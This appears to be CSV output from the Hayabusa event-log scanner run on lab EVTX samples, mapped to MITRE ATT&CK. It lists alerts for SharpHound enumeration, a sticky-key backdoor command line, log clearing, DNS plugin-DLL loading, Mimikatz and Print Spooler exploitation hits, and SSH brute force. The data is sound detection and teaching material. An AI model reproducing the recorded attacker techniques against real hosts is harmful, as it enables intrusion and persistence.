2021-05-03 17:16:43.008 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM domain users & groups discovery.evtx
2021-05-03 17:16:43.017 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM domain users & groups discovery.evtx
2021-05-03 17:58:25.921 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62173  :  LogonID: 0x88f313a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:25.942 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62188  :  LogonID: 0x88f3141d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:25.949 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62190  :  LogonID: 0x88f31435,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:25.950 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62194  :  LogonID: 0x88f31447,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.674 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62169  :  LogonID: 0x61e27259,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.677 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62167  :  LogonID: 0x5a4cc2f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.679 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62170  :  LogonID: 0xbe8573e4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.685 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62182  :  LogonID: 0x61e27296,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.686 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62175  :  LogonID: 0x5a4cc329,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.686 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62178  :  LogonID: 0x61e272a9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.687 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62179  :  LogonID: 0x5a4cc34a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.687 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62180  :  LogonID: 0xbe857415,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.688 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62184  :  LogonID: 0xbe85742e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.689 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62168  :  LogonID: 0x22c8a454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.689 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62172  :  LogonID: 0x3a7fd720,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.689 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62183  :  LogonID: 0x5a4cc36c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.690 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62187  :  LogonID: 0x61e272d5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.691 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62186  :  LogonID: 0xbe857459,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.712 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62189  :  LogonID: 0x3a7fd78b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.713 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62193  :  LogonID: 0x3a7fd7a6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.713 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62192  :  LogonID: 0x22c8a4c2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.714 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62191  :  LogonID: 0x3a7fd7ba,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.715 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62195  :  LogonID: 0x22c8a4dc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.718 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62196  :  LogonID: 0x22c8a4f7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.722 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62197  :  LogonID: 0x2a1f27d0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.733 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62198  :  LogonID: 0x2a1f27f0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.734 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62199  :  LogonID: 0x2a1f2809,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.735 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62200  :  LogonID: 0x2a1f281b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.742 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62211  :  LogonID: 0x222004fb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.742 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62209  :  LogonID: 0x258b9e7c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.752 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62219  :  LogonID: 0x22200531,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62222  :  LogonID: 0x2220054d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62223  :  LogonID: 0x22200565,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.762 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62210  :  LogonID: 0x213dfbef,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.762 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62208  :  LogonID: 0x28da8a22,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.771 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62218  :  LogonID: 0x213dfc1c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.771 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62216  :  LogonID: 0x28da8a5a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.772 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62217  :  LogonID: 0x28da8a76,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.773 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62220  :  LogonID: 0x28da8a88,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62221  :  LogonID: 0x213dfc3f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62224  :  LogonID: 0x213dfc4d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.774 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62234  :  LogonID: 0x258b9ee5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62235  :  LogonID: 0x258b9ef8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62236  :  LogonID: 0x258b9efd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface  :  Command: C:\windows\system32\cmd.exe sethc.exe 211  :  Path: C:\Windows\System32\cmd.exe  :  User: OFFSEC\admmig  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx
2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,critical,Sticky Key Like Backdoor Usage,,rules/sigma/process_creation/process_creation_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx
2021-05-15 05:39:33.214 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx
2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx
2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx
2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx
2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx
2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx
2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx
2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx
2021-05-20 21:49:31.863 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
2021-05-20 21:49:46.875 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$  :  Target User: sshd_5848  :  IP Address: -  :  Process: C:\Program Files\OpenSSH-Win64\sshd.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4624,low,Logon Type 5 - Service,User: sshd_5848  :  Workstation: -  :  IP Address: -  :  Port: -  :  LogonID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4672,informational,Admin Logon,User: sshd_5848  :  LogonID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER  :  Workstation FS01  :  Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER  :  Type: 8  :  Workstation: FS01  :  IP Address: -  :  SubStatus: 0xc0000064  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
2021-05-20 21:49:52.315 +09:00,-,-,medium,User Guessing Attempt,[condition] count() by IpAddress >= 5 in timeframe [result] count:5 IpAddress:- timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_UserGuessingDetect.yml,-
2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER  :  Workstation FS01  :  Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER  :  Type: 8  :  Workstation: FS01  :  IP Address: -  :  SubStatus: 0xc0000064  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
